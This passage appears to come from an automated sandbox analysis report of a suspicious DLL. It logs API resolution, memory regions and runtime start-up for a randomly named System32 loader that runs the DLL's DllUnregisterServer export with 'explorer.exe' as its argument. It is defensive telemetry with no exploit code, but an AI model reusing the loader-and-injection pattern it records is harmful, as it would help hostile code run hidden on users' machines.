lpProcName="WSACleanup") returned 0x77513c5f [0035.180] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0035.180] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0035.180] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0035.180] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0035.180] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0035.180] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0035.180] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0035.180] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0035.180] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0035.180] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0035.180] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0035.180] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0035.181] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0035.181] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0035.181] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0035.181] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0035.181] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0035.181] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0035.181] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0035.181] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0035.181] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0035.181] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0035.181] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0035.181] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0035.181] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0035.181] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0035.181] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0035.181] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0035.181] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0035.181] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0035.181] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0035.181] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0035.182] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0035.182] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0035.182] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0035.182] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0035.182] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0035.182] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0035.182] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0035.182] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0035.182] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0035.182] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0035.182] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0035.182] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0035.182] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0035.182] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0035.182] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0035.182] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0035.182] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0035.182] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0035.182] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0035.182] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0035.182] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0035.183] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0035.183] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0035.183] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.183] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.183] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.183] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0035.184] HeapDestroy (hHeap=0x1370000) returned 1 Process: id = "55" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4fb80" os_pid = "0xd10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllUnregisterServer /fn_args=\"explorer.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2422 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2423 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2424 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2425 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 2426 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 2427 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2428 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2429 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2430 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 2431 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 2432 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2433 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2434 start_va = 0x1a0000 end_va = 0x206fff entry_point = 0x1a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2435 start_va = 0x3a0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 2436 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2437 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2438 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2439 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2440 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2441 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2442 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2443 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2444 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2445 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2446 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2447 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 2448 start_va = 0x3b0000 end_va = 0x477fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2449 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2450 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2451 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2452 start_va = 0x50000 end_va = 0x50fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2453 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 2454 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 2455 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2456 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 2457 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2458 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2459 start_va = 0x310000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 2460 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2461 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2462 start_va = 0x1200000 end_va = 0x13effff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Thread: id = 116 os_tid = 0xd14 [0035.323] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30faec | out: lpSystemTimeAsFileTime=0x30faec*(dwLowDateTime=0xe2bdb170, dwHighDateTime=0x1d3dfba)) [0035.323] GetCurrentProcessId () returned 0xd10 [0035.323] GetCurrentThreadId () returned 0xd14 [0035.323] GetTickCount () returned 0x17f4c [0035.323] QueryPerformanceCounter (in: lpPerformanceCount=0x30fae4 | out: lpPerformanceCount=0x30fae4*=373958863) returned 1 [0035.324] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.324] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0035.324] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0035.324] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0035.324] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0035.324] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.324] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.324] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.324] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.324] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.324] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.324] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.325] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.325] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.325] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.325] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.325] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.325] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.325] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.325] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.325] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.325] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.326] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.326] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.326] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.326] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.326] GetCurrentThreadId () returned 0xd14 [0035.326] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllUnregisterServer /fn_args=\"explorer.exe\"" [0035.326] GetEnvironmentStringsW () returned 0xb7980* [0035.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0035.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x3809f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0035.326] FreeEnvironmentStringsW (penv=0xb7980) returned 1 [0035.326] GetStartupInfoA (in: lpStartupInfo=0x30fa3c | out: lpStartupInfo=0x30fa3c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0035.326] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0035.326] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0035.326] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0035.326] SetHandleCount (uNumber=0x20) returned 0x20 [0035.326] GetLastError () returned 0x0 [0035.326] SetLastError (dwErrCode=0x0) [0035.326] GetLastError () returned 0x0 [0035.326] SetLastError (dwErrCode=0x0) [0035.327] GetLastError () returned 0x0 [0035.327] SetLastError (dwErrCode=0x0) [0035.327] GetACP () returned 0x4e4 [0035.327] GetLastError () returned 0x0 [0035.327] SetLastError (dwErrCode=0x0) [0035.327] IsValidCodePage (CodePage=0x4e4) returned 1 [0035.327] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x30fa1c | out: lpCPInfo=0x30fa1c) returned 1 [0035.327] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x30f4e8 | out: lpCPInfo=0x30f4e8) returned 1 [0035.327] GetLastError () returned 0x0 [0035.327] SetLastError (dwErrCode=0x0) [0035.327] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x30f478 | out: lpCharType=0x30f478) returned 1 [0035.327] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f8fc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.327] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f8fc, cbMultiByte=256, lpWideCharStr=0x30f268, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā") returned 256 [0035.327] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā", cchSrc=256, lpCharType=0x30f4fc | out: lpCharType=0x30f4fc) returned 1 [0035.327] GetLastError () returned 0x0 [0035.327] SetLastError (dwErrCode=0x0) [0035.327] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0035.327] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f8fc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.327] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f8fc, cbMultiByte=256, lpWideCharStr=0x30f238, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0035.327] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0035.327] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x30f028, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0035.327] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x30f7fc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f 